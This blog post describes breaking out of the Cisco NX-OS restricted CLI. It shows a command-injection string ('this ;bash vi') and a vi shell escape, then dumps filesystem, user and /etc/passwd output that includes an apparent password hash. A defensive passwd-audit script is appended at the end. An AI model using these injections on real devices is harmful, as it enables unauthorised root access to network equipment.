Hacking NX-OS Part 2

As you can see in my previous article, I used the “bash” command. In later NX-OS versions this was not possible. After rooting the box, I spent a lot of time learning about all of the shell scripts and binaries on the filesystem, and I continued to hack at them.

What became my go-to command was “this”. I think “this” was an undocumented command, but once you hack into the filesystem you can see that it is an available command.

The most common hack I used looked like this:

this ;bash vi

and then just use :shell from within vi. This gives you a shell, so you can look around and do whatever you like.

When spawning a shell from within NX-OS, you may not end up with an interactive shell, so you must redirect output to your tty to see it, like so:

df > /dev/pts/0
Filesystem           1k-blocks      Used Available Use% Mounted on
/dev/pssblkdrv           59493       214     56207   1% /data_store
none                    409600    158696    250904  39% /isan
none                    102400      164    102236   1% /var/tmp
none                    153600        0    153600   0% /var/sysmgr
none                    307200    25748    281452   9% /var/sysmgr/ftp
none                    204800     3936    200864   2% /dev/shm
none                     61440        8     61432   1% /volatile
none                      2048         0      2048   0% /debug
/dev/hd-cfg0             19564      1145     17409   7% /mnt/cfg/0
/dev/hd-cfg1             19317      1145     17175   7% /mnt/cfg/1
/dev/hd-pss              19580      2826     15743  16% /mnt/pss
/dev/hd-bootflash       181724     94174     78168  55% /bootflash
127.1.2.2:/mnt/cf/partner
186683    13960    163085   8% /modflash_2-1

id > /dev/pts/0
uid=2002(admin) gid=503(network-admin) groups=503(network-admin)

uname -a > /dev/pts/0
Linux MDS4 2.4.20_mvl31-cpci735 #1 Wed Dec 16 15:50:36 PST 2009 i686 unknown

cat /etc/passwd > /dev/pts/0
root:*:0:0:root:/root:/isanboot/bin/nobash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm
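
The passwd listing above has a value other than * or x in one password field, several entries with an empty shell field, and one account with /bin/sh. The following is an added example, not part of the original post: a small audit of passwd(5)-format text that reports those conditions. The sample input is constructed in the same shape as the listing, with a made-up placeholder hash, and the list of general-purpose shells is an assumption.

```python
import string

CRYPT_ALPHABET = set(string.ascii_letters + string.digits + "./")
NO_INLINE_HASH = {"x", "*", "!", "!!"}   # shadowed or locked markers
GENERAL_SHELLS = {"/bin/sh", "/bin/bash", "/bin/ash", "/bin/csh", "/bin/ksh"}

# Constructed sample shaped like the listing above. The hash is a made-up
# placeholder, not the value from the page.
SAMPLE = """\
root:*:0:0:root:/root:/isanboot/bin/nobash
bin:*:1:1:bin:/bin:
ftpuser:aaBBccDDeeFF0:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm
broken-line-without-enough-fields
"""

def audit_passwd(text):
    """Return a sorted list of (user, finding) tuples for passwd-format text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry"))
            continue
        user, pw, uid, _gid, _gecos, _home, shell = fields
        if pw == "":
            findings.append((user, "empty password field"))
        elif pw not in NO_INLINE_HASH:
            # 13 characters from the crypt alphabet is the traditional DES form
            is_des = len(pw) == 13 and set(pw) <= CRYPT_ALPHABET
            kind = "DES crypt" if is_des else "inline"
            findings.append((user, f"{kind} hash readable by every local user"))
        if uid == "0" and user != "root":
            findings.append((user, "extra UID 0 account"))
        effective = shell or "/bin/sh"   # passwd(5): empty shell means /bin/sh
        if effective in GENERAL_SHELLS:
            note = "general-purpose shell" + ("" if shell else " (implicit)")
            findings.append((user, note))
    return sorted(findings)

if __name__ == "__main__":
    for user, finding in audit_passwd(SAMPLE):
        print(f"{user}: {finding}")
```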
